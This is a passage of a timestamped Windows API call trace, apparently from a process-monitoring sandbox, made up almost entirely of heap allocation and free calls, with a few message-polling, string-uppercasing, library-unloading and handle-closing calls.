(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0252.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0252.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0252.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0252.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0252.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0252.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0252.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.889] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0252.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0252.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0252.889] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0252.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.889] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0252.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0252.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.890] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0252.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0252.891] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0252.891] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0252.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0252.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0252.892] FreeLibrary (hLibModule=0x74d40000) returned 1 [0252.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0252.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.892] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.892] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0252.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.892] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0252.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0252.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0252.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0252.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0252.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0252.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0252.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0252.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0252.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0252.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0252.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0252.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0252.894] CloseHandle (hObject=0x2cc) returned 1 [0252.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0252.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0252.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0252.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0252.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.895] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0252.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0252.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0252.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0252.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0252.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0252.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0252.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0252.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.896] CloseHandle (hObject=0x294) returned 1 [0252.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0252.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0252.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0252.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.902] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0252.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0252.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0252.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0252.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0252.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0252.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0252.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0252.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0252.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0252.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0252.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0252.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0252.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0252.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0252.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0252.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0252.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0252.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0252.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0252.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0252.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0252.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0252.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0252.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0252.904] HeapFree (in: 